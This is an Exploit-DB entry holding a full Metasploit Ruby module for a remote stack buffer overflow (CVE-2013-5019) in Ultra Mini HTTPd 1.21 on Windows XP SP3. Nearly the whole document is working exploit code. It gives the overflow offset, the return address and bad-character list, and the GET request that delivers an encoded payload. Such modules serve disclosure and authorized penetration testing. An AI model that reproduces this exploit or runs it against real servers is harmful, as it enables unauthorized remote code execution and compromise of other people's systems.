Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)

EDB-ID:

27608




Platform:

Windows

Date:

2013-08-15


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Ultra Mini HTTPD Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21
        allowing remote attackers to execute arbitrary code via a long resource name in an HTTP
        request.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'superkojiman',  #Discovery, PoC
          'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '95164'],
          ['EDB','26739'],
          ['CVE','2013-5019'],
          ['BID','61130']
        ],
      'Payload'        =>
        {
          'Space' => 1623,
          'StackAdjustment' => -3500,
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f"
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "thread"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'v1.21 - Windows XP SP3',
            {
              'Offset' => 5412,
              'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 10 2013',
      'DefaultTarget'  => 0
    ))
  end

  def exploit
    buf = rand_text(target['Offset'])
    buf << [target.ret].pack("V*")
    buf << payload.encoded

    print_status("Sending buffer...")
    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/#{buf}"
    })
  end
end